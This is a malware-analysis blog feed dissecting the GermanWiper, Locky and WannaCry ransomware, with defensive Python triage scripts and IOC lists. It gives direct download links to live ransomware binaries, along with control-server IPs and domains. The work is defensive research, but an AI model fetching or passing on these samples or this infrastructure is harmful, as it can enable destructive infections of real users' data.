<p></br></p>TFW Ransomware is only your side hustle...2019-07-31T00:00:00+02:002019-07-31T00:00:00+02:00f0wLtag:dissectingmalwa.re,2019-07-31:/tfw-ransomware-is-only-your-side-hustle.html<p>and you constantly have to apply for jobs. A partial analysis of the "GermanWiper" Ransomware</p><p>Today someone posted about a ransomware attack on the local chat platform <a href="https://jodel.com/">Jodel</a> (don't judge please, as you know the sketchy corners of the web get you the best samples :D), which instantly piqued my interest. What I got was this email and the two attached files.
</br>
</br>
</br>
<img alt="Screenshot of the E-Mail" src="https://dissectingmalwa.re/img/jodel-email.png">
</br>
</br>
</br></p>
<p>The two attached files <em>Applicant Name - Lebenslauf Aktuell.doc.lnk</em> and <em>Applicant Name - Arbeitszeugnisse Aktuell.doc.lnk</em> are made to look like Microsoft Office Documents but are actually just Windows File Shortcuts and can easily be parsed with the <a href="https://code.google.com/archive/p/lnk-parser/">LNK Parser @ Google Code</a>. The output looks like this:
</br>
</br>
</br></p>
<p><img alt="Parsed file" src="https://dissectingmalwa.re/img/jodel-link.png">
</br>
</br>
</br>
The person who provided me with this data was kind enough to also include the ransom note, which is, unlike most ransomware strains out there in the wild wild cyber west, not a txt file but rather an HTML file. It includes links to bitcoin exchanges, a hardcoded wallet address and asks for 0.15038835 BTC as a ransom. Just like the e-mail it is written in spotless German but without umlauts (ä, ö, ü). A cleaned sample can be found <a href="https://dissectingmalwa.re/other/clean.html">here</a>.
</br>
</br>
Communication with the attacker's server at <em>173.33.106.120</em> (hosted at OVH) is done via a PHP script at the bottom of the ransom note. Since the server was not reachable at the time of analysis I could not take a closer look at either the script or the dropped <em>.hta</em> file that is run via the PowerShell command in the .lnks.
</br>
</br>
</br>
<img alt="Parsed file" src="https://dissectingmalwa.re/img/jodel-url.png">
</br>
</br>
</br>
The most worrying thing about this sample is the "encryption" though. Every file touched by <em>GermanWiper</em> is overwritten with zeros. A list of file extensions used by the wiper can be found on <a href="https://pastebin.com/rUGpEBfD">pastebin</a>. Because of this behaviour the malware was dubbed "GermanWiper" by Michael Gillespie (<a href="https://twitter.com/demonslay335">@Demonslay335</a>). The BleepingComputer Forum post discussing this strain can be found <a href="https://www.bleepingcomputer.com/forums/t/701735/germanwiper-ransomware-with-random-extensions-08kja-avco3-oqn1b/">here</a>.
</br>
</br>
</br>
<center><img alt="Zeroed File" src="https://dissectingmalwa.re/img/jodel-zeros.png"></center>
</br>
</br>
A not-so-Happy Ending: <em>Encrypted files will not be recoverable</em> and if you are a victim please spend your money somewhere else and <em>not on the ransom</em>.
</br>
</br></p>
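<p>Because GermanWiper only overwrites files with zeros, a responder can tell a wiped file from a genuinely encrypted one by content alone. The following Python triage script is an added example and not part of the original post: it walks a directory tree, skips the folders from the wiper's exclusion list, and classifies each file as zeroed, high-entropy or plain. The sample files it creates are constructed, and the random-looking extensions are borrowed from the BleepingComputer thread title linked above.</p>

```python
import math
import os
import tempfile
from collections import Counter

# Folder names the wiper leaves alone, taken from the post's "Skipped Folders
# and Filenames" list (lower-cased); files below them are not counted here either.
SKIPPED_DIRS = {
    "windows", "recycle.bin", "mozilla", "google", "boot", "application data",
    "appdata", "program files", "program files (x86)", "programme",
    "programme (x86)", "programdata", "perflogs", "intel", "msocache",
    "system volume information",
}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0 for zero-filled data, close to 8 for ciphertext."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify_file(path: str, sample_size: int = 64 * 1024) -> str:
    """Classify a file by the content of its first sample_size bytes."""
    with open(path, "rb") as fh:
        head = fh.read(sample_size)
    if not head:
        return "empty"
    if head.count(0) == len(head):
        return "zeroed"        # GermanWiper: overwritten with zeros, unrecoverable
    if shannon_entropy(head) > 7.5:
        return "high-entropy"  # what real ransomware output (or a packed binary) looks like
    return "plain"


def triage_tree(root: str) -> dict:
    """Walk root, prune the wiper's excluded folders, classify every file."""
    results = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d.lower() not in SKIPPED_DIRS]
        for name in filenames:
            full = os.path.join(dirpath, name)
            results[os.path.relpath(full, root)] = classify_file(full)
    return results


def summarize(results: dict) -> Counter:
    """Count how many files fell into each class."""
    return Counter(results.values())


def build_demo_tree(root: str) -> None:
    """Write constructed sample files: a zeroed victim file, random data,
    plain text, and one zeroed file under a skipped folder."""
    os.makedirs(os.path.join(root, "Documents"))
    os.makedirs(os.path.join(root, "Windows"))
    with open(os.path.join(root, "Documents", "report.docx.08kja"), "wb") as fh:
        fh.write(b"\x00" * 8192)     # what GermanWiper leaves behind
    with open(os.path.join(root, "Documents", "photo.jpg.avco3"), "wb") as fh:
        fh.write(os.urandom(8192))   # stand-in for genuinely encrypted content
    with open(os.path.join(root, "Documents", "notes.txt"), "wb") as fh:
        fh.write(b"quarterly numbers, see attached\n" * 64)
    with open(os.path.join(root, "Windows", "win.ini"), "wb") as fh:
        fh.write(b"\x00" * 512)      # inside a skipped folder, must not be counted


def demo() -> dict:
    """Run the triage over the constructed tree and return the class counts."""
    with tempfile.TemporaryDirectory() as root:
        build_demo_tree(root)
        return dict(summarize(triage_tree(root)))


if __name__ == "__main__":
    print(demo())
```

On a real victim machine point <code>triage_tree</code> at the user profile; a result dominated by "zeroed" confirms the wiper behaviour and tells you that restoring from backup is the only option.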
<h2>Update: A look at the dropped executable</h2>
<p>GermanWiper available @ <a href="https://malshare.com/sample.php?action=detail&hash=36ccd442755d482900b57188ae3a89a7">https://malshare.com/sample.php?action=detail&hash=36ccd442755d482900b57188ae3a89a7</a>
</br>
<em>sha256 41364427dee49bf544dcff61a6899b3b7e59852435e4107931e294079a42de7c</em></p>
<p><img alt="Running germanWiper" src="https://dissectingmalwa.re/img/germanWiper-run.png"></p>
<p>As a first step I like to run my samples through "Detect it easy" to get a first look at what to expect. Not a huge discovery, but it is interesting nonetheless that the executable was likely compiled with Visual Studio 2010. </p>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/germanWiper-die.png"></center></p>
<p>Let's check the entropy of the sample to see if it is packed. Heavy obfuscation is a rare sight for ransomware, but running your executable through a packer or crypter of some sort might avoid detection through already existing signatures and ransom campaigns often ship more than one version of their executable.</p>
<p><center><img alt="Zeroed File" src="https://dissectingmalwa.re/img/germanWiper-entropy.png"></center></p>
<p>A quick test to see how much effort the attackers have put into it is to try to unpack it with upx, but no such luck in this case:
</br>
</br>
<img alt="UPX" src="https://dissectingmalwa.re/img/germanWiper-upx.png">
</br>
</br>
</br>
I'm not quite sure why, but the attackers set an Amazon logo as the file icon for the malware. Maybe to lure the victim into clicking on it?
</br>
</br>
<center><img alt="Zeroed File" src="https://dissectingmalwa.re/img/germanWiper-filepng.png"></center>
</br>
</br>
With this sample we also get to see a new domain for a control server at expandingdelegation[.]top (<em>8.208.13.24</em>) in the ransom note, so this sample might already be part of a second wave since it was still dropping the executable today (02.08.2019).
</br>
</br>
<img alt="Parsed file" src="https://dissectingmalwa.re/img/germanWiper-newURL.png">
</br>
</br>
A couple of noteworthy events after running the sample in a virtual machine: the ransomware runs vssadmin.exe to delete system restore points and shadow copies. Furthermore this command will disable recovery options at system startup, but not without first asking the victim for their approval (how nice of them).
</br>
</br>
<center><img alt="Zeroed File" src="https://dissectingmalwa.re/img/germanWiper-vssadmin.png"></center>
</br>
</br>
The seemingly arbitrary process description of the GermanWiper process might be a handy string to keep in mind for identification of samples in the future.
</br>
</br>
<img alt="Parsed file" src="https://dissectingmalwa.re/img/germanWiper-ph.png">
</br>
</br>
To display the ransom note after system startup it creates two entries in the start menu...
</br>
</br>
<center><img alt="Zeroed File" src="https://dissectingmalwa.re/img/germanWiper-start.png"></center>
</br>
</br>
...and an entry to open the HTML ransom file in the msconfig autostart.
</br>
</br>
<center><img alt="Zeroed File" src="https://dissectingmalwa.re/img/germanWiper-autostart.png"></center>
</br>
</br>
</br></p>
<h2><em>IOCs</em></h2>
<h3>Files</h3>
<div class="highlight"><pre><span></span><span class="n">wiper</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--SHA1--> 8cd96603cdd2637cf5469aba8ed2b149c35ef699</span>
<span class="n">Arbeitszeugnisse</span> <span class="o">-</span> <span class="n">Lebenslauf</span> <span class="o">-</span> <span class="n">Doris</span> <span class="n">Sammer</span><span class="p">.</span><span class="n">zip</span> <span class="c1">--SHA1--> 058ad51c8eb86545a5424c0b021235da3bbce1c8</span>
<span class="n">Doris</span> <span class="n">Sammer</span> <span class="o">-</span> <span class="n">Arbeitszeugnisse</span> <span class="n">Aktuell</span><span class="p">.</span><span class="n">doc</span><span class="p">.</span><span class="n">lnk</span> <span class="c1">--SHA1--> 2d8f89693d14b9ea7a056bced983dfc88fe76105</span>
<span class="n">Doris</span> <span class="n">Sammer</span> <span class="o">-</span> <span class="n">Lebenslauf</span> <span class="n">Aktuell</span><span class="p">.</span><span class="n">doc</span><span class="p">.</span><span class="n">lnk</span> <span class="c1">--SHA1--> 77d5224fc02999b04ab79054aad23b0f6213b7eb</span>
</pre></div>
<h3>Malspam Domains</h3>
<div class="highlight"><pre><span></span><span class="n">applicant</span><span class="p">.</span><span class="n">name</span><span class="o">[</span><span class="n">at</span><span class="o">]</span><span class="n">rasendmail</span><span class="p">.</span><span class="n">com</span><span class="w"></span>
<span class="n">applicant</span><span class="p">.</span><span class="n">name</span><span class="o">[</span><span class="n">at</span><span class="o">]</span><span class="n">stadtmailer</span><span class="p">.</span><span class="n">com</span><span class="w"></span>
<span class="n">applicant</span><span class="p">.</span><span class="n">name</span><span class="o">[</span><span class="n">at</span><span class="o">]</span><span class="n">nrwmail</span><span class="p">.</span><span class="n">com</span><span class="w"></span>
<span class="n">applicant</span><span class="p">.</span><span class="n">name</span><span class="o">[</span><span class="n">at</span><span class="o">]</span><span class="n">mailplatz</span><span class="p">.</span><span class="n">com</span><span class="w"></span>
</pre></div>
<h3>Dropper URLs/IPs</h3>
<div class="highlight"><pre><span></span><span class="mi">173</span><span class="p">.</span><span class="mi">33</span><span class="p">.</span><span class="mi">106</span><span class="p">[.]</span><span class="mi">120</span>
<span class="n">moneymaker</span><span class="p">[.]</span><span class="n">software</span>
<span class="n">expandingdelegation</span><span class="p">[.]</span><span class="n">top</span>
</pre></div>
<h3>Skipped Folders and Filenames</h3>
<div class="highlight"><pre><span></span><span class="n">autorun</span><span class="p">.</span><span class="n">inf</span>
<span class="n">boot</span><span class="p">.</span><span class="n">ini</span>
<span class="n">bootfont</span><span class="p">.</span><span class="n">bin</span>
<span class="n">bootsect</span><span class="p">.</span><span class="n">bak</span>
<span class="n">desktop</span><span class="p">.</span><span class="n">ini</span>
<span class="n">iconcache</span><span class="p">.</span><span class="n">db</span>
<span class="n">ntldr</span>
<span class="n">ntuser</span><span class="p">.</span><span class="n">dat</span>
<span class="n">ntuser</span><span class="p">.</span><span class="n">dat</span><span class="p">.</span><span class="n">log</span>
<span class="n">ntuser</span><span class="p">.</span><span class="n">ini</span>
<span class="n">bootmgr</span>
<span class="n">bootnxt</span>
<span class="n">thumbs</span><span class="p">.</span><span class="n">db</span>
<span class="n">Windows</span>
<span class="n">recycle</span><span class="p">.</span><span class="n">bin</span>
<span class="n">mozilla</span>
<span class="n">google</span>
<span class="n">boot</span>
<span class="n">application</span> <span class="k">data</span>
<span class="n">appData</span>
<span class="n">program</span> <span class="n">files</span>
<span class="n">program</span> <span class="n">files</span> <span class="p">(</span><span class="n">x86</span><span class="p">)</span>
<span class="n">programme</span>
<span class="n">programme</span> <span class="p">(</span><span class="n">x86</span><span class="p">)</span>
<span class="n">programdata</span>
<span class="n">perflogs</span>
<span class="n">intel</span>
<span class="n">msocache</span>
<span class="k">System</span> <span class="n">Volume</span> <span class="n">Information</span>
</pre></div>
<p></br>
Thanks again to <a href="https://twitter.com/demonslay335">@Demonslay335</a>, <a href="https://twitter.com/James_inthe_box">@James_inthe_box</a> and all the other researchers who contributed to the analysis of this threat. This article has also been mentioned in this excellent <a href="https://www.zdnet.com/article/germanwiper-ransomware-hits-germany-hard-destroys-files-asks-for-ransom/">ZDNet Article</a>, which is quite an honor, thanks :D</p>
<h1>Picking Locky</h1>
<p>Published 2019-07-30 by f0wL</p>
<p>Back in 2016 Locky was (one of) the first to commercialize the "art" of holding data for ransom. I picked this strain because I would like a bit more of a challenge in terms of obfuscation and anti-disassembly techniques, so strap in for this OG Ransomware.</p><p>Locky (at least the first few versions) is said to have been created by the makers of the Dridex/Cridex banking trojans. For example, the spreading mechanism via macros in Word or Excel documents sent out via carefully crafted spear-phishing emails is exactly the same for both of these strains.</p>
<h4><em>A general disclaimer as always: downloading and running the samples linked below will lead to the encryption of your personal data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<h3>Today's samples are brought to you by:</h3>
<p>Locky #1 available @ <a href="https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/Ransomware.Locky">https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/Ransomware.Locky</a>
<code>sha256 bc98c8b22461a2c2631b2feec399208fdc4ecd1cd2229066c2f385caa958daa3</code></p>
<p>Locky.AZ available @ <a href="https://s3.eu-central-1.amazonaws.com/dasmalwerk/downloads/2e4319ff62c03a539b2b2f71768a0cfc0adcaedbcca69dbf235081fe2816248b/2e4319ff62c03a539b2b2f71768a0cfc0adcaedbcca69dbf235081fe2816248b.zip">https://dasmalwerk.eu/</a>
<code>sha256 2e4319ff62c03a539b2b2f71768a0cfc0adcaedbcca69dbf235081fe2816248b</code>
</br>
</br>
</br>
<img alt="Running Locky" src="https://dissectingmalwa.re/img/locky-ph.png">
</br>
</br>
Running this first Locky sample was pretty unspectacular since nothing really happened. Let's take a look at the binary first:</p>
<p><img alt="Locky Import Information" src="https://dissectingmalwa.re/img/locky-import.png"></p>
<p><img alt="Running it through Detect it easy" src="https://dissectingmalwa.re/img/locky-die.png">
</br>
</br>
Would you look at that! We found ourselves some poor man's obfuscation :D A whole bunch of random strings to make the analyst's life just a little bit harder. We'll come back to this later to see if we can simplify our strings output a bit.
</br>
</br>
<img alt="Found strings" src="https://dissectingmalwa.re/img/locky-strings.png"></p>
<p>After a couple of seconds it spawns a new svchost.exe process with the same icon as Locky.exe had previously. Of course we'll dump the process memory to a file (just right-click the listing in Process Hacker and choose <em>Create dump</em> from the context menu).
</br>
</br>
</br>
<img alt="Found strings" src="https://dissectingmalwa.re/img/locky-ph2.png">
</br>
</br>
</br>
Looking at the properties of the new <em>svchost.exe</em> process we can see that it is actually run from C:\Users\IEUser\AppData\Local\Temp\ and it's unsigned as well.
</br>
<center><img alt="Running as svchost.exe" src="https://dissectingmalwa.re/img/locky-svchost.png"></center>
</br>
</br>
</br></p>
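The observation above (a process named svchost.exe that runs from a user's Temp directory, is unsigned and was not started by the service control manager) can be turned into a simple triage rule. The following Python is an added example, not code from the original post; the process records, PIDs and the parent name Locky.exe are constructed sample data, and the set of legitimate directories is an assumption for a default Windows install.

```python
import ntpath
from dataclasses import dataclass

# Directories a genuine svchost.exe is started from on a default Windows installation (assumption)
LEGIT_SVCHOST_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


@dataclass
class Proc:
    """One row of a process listing (the fields Process Hacker shows in its properties view)."""
    pid: int
    name: str
    image_path: str
    parent_name: str
    signed: bool


def svchost_findings(p: Proc) -> list:
    """Reasons this process looks like a masquerading svchost.exe; an empty list means nothing odd."""
    if p.name.lower() != "svchost.exe":
        return []
    reasons = []
    directory = ntpath.dirname(p.image_path).lower().rstrip("\\")
    if directory not in LEGIT_SVCHOST_DIRS:
        reasons.append(f"runs from {directory} instead of a Windows system directory")
    if not p.signed:
        reasons.append("image is unsigned (the real svchost.exe carries a Microsoft signature)")
    if p.parent_name.lower() != "services.exe":
        reasons.append(f"parent is {p.parent_name}, expected services.exe")
    return reasons


def scan(procs: list) -> dict:
    """Map pid -> findings for every suspicious svchost.exe in the listing."""
    result = {}
    for p in procs:
        reasons = svchost_findings(p)
        if reasons:
            result[p.pid] = reasons
    return result


# Constructed sample listing: the Locky-spawned process described above next to a genuine service host.
SAMPLE_PROCESSES = [
    Proc(4128, "svchost.exe", r"C:\Users\IEUser\AppData\Local\Temp\svchost.exe", "Locky.exe", False),
    Proc(808, "svchost.exe", r"C:\Windows\System32\svchost.exe", "services.exe", True),
    Proc(1560, "explorer.exe", r"C:\Windows\explorer.exe", "userinit.exe", True),
]

if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_PROCESSES).items():
        print(pid, reasons)
```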
<h2>Trojan.Ransom.Locky.AZ</h2>
<p><center><img alt="This one is just a literal element" src="https://dissectingmalwa.re/img/locky_az-run.png"></center></p>
<p>https://www.hybrid-analysis.com/sample/2e4319ff62c03a539b2b2f71768a0cfc0adcaedbcca69dbf235081fe2816248b/5cd5813d028838383d3ab408</p>
<p><img alt="Running Locky.AZ" src="https://dissectingmalwa.re/img/locky_az-info.png"></p>
<p>This article is a work in progress, updates are going to follow soon.</p>
<h2><em>IOCs</em></h2>
<h3>Locky (SHA256)</h3>
<div class="highlight"><pre><span></span><span class="mi">2</span><span class="n">e4319ff62c03a539b2b2f71768a0cfc0adcaedbcca69dbf235081fe2816248b</span>
<span class="mi">5</span><span class="n">ed2f09e648dca8f0ca75466b1442f6e599afddc80777e0559fb6881c6cd9ff3</span>
<span class="mi">3</span><span class="n">b60fde281d91cc3e7ea3e343ee5b13a31def564903c0136ae928f70e25c3c02</span>
<span class="mi">6</span><span class="n">afc78b5630726c907a69d62a6c8a7d86326e21383fe3aae1efc715342238e02</span>
</pre></div>
<h1>Third time's the charm? Analysing WannaCry samples</h1>
<p>Published 2019-07-28 by f0wL</p>
<p>After over two years since the initial spread of the ransomware and Malwaretech's sentencing last week I got a bit nostalgic and took a second look at different samples.</p><p><img alt="Running a sample in a Windows 7 VM" src="https://dissectingmalwa.re/img/run.png"></p>
<p></br>
Since the first wave of infections in May 2017 WannaCry is basically the go-to example for the whole ransomware scheme, and that is actually a good thing. The potential damage that WannaCry and the variants following the original version could have caused would have been massive if it hadn't been for Malwaretech, 2sec4u and all the other researchers who helped to contain the spread of ransomware powered by the wormable EternalBlue exploit. Funnily enough there are still people from around the world that pay the ~$300 ransom in hopes of getting their data decrypted, as can be seen <a href="https://twitter.com/actual_ransom">here</a>.
</br></p>
<h4><em>A general disclaimer as always: downloading and running the samples (especially the ones without the kill switch) linked below will lead to the encryption of your personal data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<p></br></p>
<h3>The three samples I'll be looking at:</h3>
<p>Wannacry Sample #1 sometimes referred to as "dropper" available @ <a href="https://www.ghidra.ninja/samples/wannacry.zip">https://www.ghidra.ninja/samples/wannacry.zip</a>
<code>sha256 24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c</code></p>
<p>Wannacry Sample #2 sometimes referred to as "encryptor" available @ <a href="https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/Ransomware.WannaCry">https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/Ransomware.WannaCry</a>
<code>sha256 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa</code></p>
<p>Wannacry Plus available @ <a href="https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/Ransomware.WannaCry_Plus">https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/Ransomware.WannaCry_Plus</a>
<code>sha256 55504677f82981962d85495231695d3a92aa0b31ec35a957bd9cbbef618658e3</code>
</br>
</br>
</br>
The first thing we're going to take a look at is the symbol tree. Stepping into the function called <em>entry</em> we notice that it is in fact not the main / WinMain function, but rather a preparing function that will call WinMain at the end (this might actually be an artifact of Ghidra's decompiler). </p>
<p><img alt="functions window" src="https://dissectingmalwa.re/img/functions.png">
</br>
</br>
</br>
Because the decompilation result in our WinMain function is not that pretty yet we will edit its function signature to match the one described in the <a href="https://docs.microsoft.com/en-us/windows/win32/learnwin32/winmain--the-application-entry-point">Win32 API Reference</a>.
</br>
</br>
</br>
<code>int WINAPI wWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PWSTR pCmdLine, int nCmdShow);</code>
</br>
</br>
</br>
<img alt="Setting the correct function signature for WinMain" src="https://dissectingmalwa.re/img/sig-correct.png"></p>
<p></br>
</br>
After this is done the decompilation result will be much better and easier on the eyes. One of the first things you will spot is the famous <em>Kill Switch URL</em> registered by Malwaretech after the initial outbreak, which to this day points to the Kryptos Logic sinkhole. After Line 41 you are also able to see multiple InternetOpen etc. function calls that check if the aforementioned URL is registered and reachable. If that is the case it will close the connection and exit before the encryption process has even started. Of course this also means that if the infected PC is not connected to the Interwebs (remember it propagates via SMB over local networks as well) or is unable to resolve the domain name, the ransomware will go to town with the user's files.
</br>
</br>
Looking into sample #2 there is actually no such kill switch, which means that it is one of the later versions following the initial outbreak. </p>
<p><img alt="Decompilation result after setting the function signature" src="https://dissectingmalwa.re/img/winmain_sig.png">
</br>
</br>
</br>
To show the differences between the kill-switched first sample and the second rambo version I fired up hasherezade's awesome PE-Bear and loaded Sample #2 and #1. This indeed confirms that the samples are basically the same, but version #2 is missing the notorious kill switch. </p>
<p><img alt="Comparison of Sample #1 and #2" src="https://dissectingmalwa.re/img/bear_comp.png"></p>
<p></br>
</br>
</br>
</br></p>
<h2>WannaCry Plus</h2>
<p>I haven't heard of this strain/ variant before, but it got its own subfolder in ytisf's TheZoo so it has to be special in some way, right? Let's first check the entropy of the binary with "Detect it easy" to see if it is packed or obfuscated in any way:</p>
<p><img alt="Detect it easy's entropy window" src="https://dissectingmalwa.re/img/wc_plus-die.png"></p>
<p>Looking at the entropy graph we can pretty comfortably say that the PE is neither packed nor obfuscated (which would have been out of the ordinary for a WannaCry sample anyway). Looking at the symbol tree we are greeted with a new function called PlayGame. Please no Fortnite ransomware kthxbye :D We'll have a look into that later.
</br>
</br></p>
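The per-section entropy view that Detect It Easy draws can be reproduced without the GUI. The Python below is an added example, not code from the original post: it parses the PE section table, computes the Shannon entropy of each section's raw data and flags sections at or above 7 bits per byte (the 7.0 threshold and the section names are assumptions); the image it analyses is a constructed stand-in built by `build_test_pe`, not one of the samples.

```python
import hashlib
import math
import struct
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for constant data, up to 8.0 for uniform random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())

def pe_section_entropy(pe: bytes) -> dict:
    """Walk the PE section table and return {section name: entropy of its raw data} (no PE library needed)."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                    # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    sec = coff + 20 + opt_size                             # first IMAGE_SECTION_HEADER (40 bytes each)
    result = {}
    for _ in range(num_sections):
        name = pe[sec:sec + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, sec + 16)  # SizeOfRawData, PointerToRawData
        result[name] = shannon_entropy(pe[raw_ptr:raw_ptr + raw_size])
        sec += 40
    return result

def likely_packed(sections: dict, threshold: float = 7.0) -> list:
    """Section names at or above the threshold; ~7+ bits/byte is the usual 'packed or encrypted' heuristic."""
    return [name for name, ent in sections.items() if ent >= threshold]

def pseudo_random(n: int, seed: bytes = b"entropy-demo") -> bytes:
    """Deterministic high-entropy filler from a SHA-256 chain (stands in for packed/encrypted content)."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])

def build_test_pe(sections: list) -> bytes:
    """Construct a minimal, non-loadable PE image with the given [(name, raw_bytes)] sections (test data only)."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0)   # SizeOfOptionalHeader = 0
    data_start = e_lfanew + 4 + 20 + 40 * len(sections)
    table, body = bytearray(), bytearray()
    for name, data in sections:
        table += name.encode().ljust(8, b"\0")
        table += struct.pack("<IIII", len(data), 0, len(data), data_start + len(body)) + b"\0" * 16
        body += data
    return bytes(dos) + b"PE\0\0" + coff + bytes(table) + bytes(body)

# Constructed sample: repetitive "code", readable strings, and a high-entropy UPX-style section.
SAMPLE_PE = build_test_pe([
    (".text", b"\x55\x8b\xec\x83\xc4\x10" * 300),
    (".rdata", b"This program cannot be run in DOS mode.\r\n" * 50),
    ("UPX1", pseudo_random(4096)),
])

if __name__ == "__main__":
    print(pe_section_entropy(SAMPLE_PE), likely_packed(pe_section_entropy(SAMPLE_PE)))
```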
<p><img alt="The Symbol tree of WannaCry Plus" src="https://dissectingmalwa.re/img/wc_plus-fuctions.png">
</br>
</br>
Jumping into the entry function things are looking quite different compared to the first two samples. Following the procedure we are dropped into FUN_10001016, which is what I presume to be the file encryption function. This is pretty easy to spot through the rather characteristic combination of <em>FindResourceA</em>, <em>CreateFileA</em> and <em>WriteFile</em>.
</br>
</br>
<img alt="What I presume to be the encryption function" src="https://dissectingmalwa.re/img/wc_plus-enc.png"></p>
<p>To see what happens if I run the malware I fired up a Windows 7 x86 VM in VirtualBox provided by <a href="https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/">https://modern.ie/</a>. After seeing the error message below I thought the executable might actually be an x86_64 one since it refuses to run on the 32-bit Windows 7 system. Even these days it is actually quite unusual for malware to be compiled for x64 systems only since it'll cut out a lot of the old and vulnerable systems running x86 XP, for example (which is kind of a no-brainer since the potatohead holding PCs for ransom would want to maximise the attack surface and earnings).
</br>
</br>
<img alt="Running WannaCry Plus in a VM" src="https://dissectingmalwa.re/img/wc_plus-run.png">
Kudos to Microsoft in this case: Their Defender and SmartScreen really stepped up their game. For an attacker and (sadly) for a malware reverse engineer it is actually quite difficult to circumvent or disable the built-in Mal-/Ransomware Protection. You are constantly greeted with Pop-Ups about a detected ransomware executable and the Defender will even go as far as simply deleting your precious sample :(
<img alt="Running WannaCry Plus in a Win10 x86_64 VM" src="https://dissectingmalwa.re/img/wc_plus-mal.png">
But even after calming down the Windows Defender I couldn't get the malware to encrypt anything :S
<img alt="Running WannaCry Plus in a Win10 x86_64 VM" src="https://dissectingmalwa.re/img/wc_plus-norun.png">
Looking at the Anyrun Sandbox Analysis <a href="https://app.any.run/tasks/f889f338-712f-44aa-b387-f501f3ed7c48/">over here</a> we see the same error message but it seems to drop another executable called "SearchProtocolHost.exe" which is probably RunPE Process Hollowing at play. The next step will probably be manual debugging, so stay tuned! </p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>Wannacry (SHA256)</h3>
<div class="highlight"><pre><span></span><span class="mi">24</span><span class="n">d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c</span>
<span class="n">ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa</span>
<span class="mi">55504677</span><span class="n">f82981962d85495231695d3a92aa0b31ec35a957bd9cbbef618658e3</span>
<span class="mi">32</span><span class="n">f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf</span>
<span class="mi">697158</span><span class="n">bcade7373ccc9e52ea1171d780988fc845d2b696898654e18954578920</span>
<span class="n">ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa</span>
</pre></div>
<h1>Useful Resources for Reverse Engineering and Malware Analysis</h1>
<p>Published 2019-06-01 by f0wL</p>
<p>Just another collection of links, videos, books and other materials related to RE and Malware Research.</p><p>I'll update this list regularly to keep it somewhat relevant, so be sure to bookmark this page if you like the contents so far.
</br>
</br></p>
<h2>Books</h2>
<ul>
<li>
<p>"Reversing: Secrets of Reverse Engineering" by Eldad Eilam</p>
</li>
<li>
<p>"Reversing: secrets of reverse engineering practical reverse engineering: x86, x64, ARM, Windows kernel, Reversing tools, and obfuscation" by Bruce Dang, Alexandre Gazet and Elias Bachaalany</p>
</li>
<li>
<p>"The Shellcoder's Handbook: Discovering and Exploiting Security Holes" by Chris Anley, John Heasman, Felix Lindner and Gerardo Richarte</p>
</li>
<li>
<p>"Hacker Dissassembling Uncovered" by Kris Kaspersky</p>
</li>
<li>
<p>"The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System" by Bill Blunden</p>
</li>
<li>
<p>"Practical Malware Analysis - The Hands-On Guide to Dissecting Malicious Software" by Michael Sikorski and Andrew Honig</p>
</li>
<li>
<p>"Malware Data Science - Attack Detection and Attribution" by Joshua Saxe and Hillary Sanders</p>
</li>
<li>
<p>"The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory" by Michael Hale-Ligh, Andrew Case, Jamie Levy and Aaron Walters</p>
</li>
<li>
<p>"Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code" by Michael Hale-Ligh, Steven Adair, Blake Hartstein and Matthew Richard</p>
</li>
<li>
<p>"Practical Binary Analysis - Build Your Own Linux Tools for Binary Instrumentation, Analysis, and Disassembly" by Dennis Andriesse</p>
</li>
<li>
<p>"Practical Forensic Imaging - Securing Digital Evidence with Linux Tools" by Bruce Nikkel</p>
</li>
<li>
<p>"Rootkits and Bootkits - Reversing Modern Malware and Next Generation Threats" by Alex Matrosov, Eugene Rodionov and Sergey Bratus</p>
</li>
</ul>
<p></br>
</br></p>
<h2>Websites</h2>
<ul>
<li><a href="https://ghidra.re">https://ghidra.re</a></li>
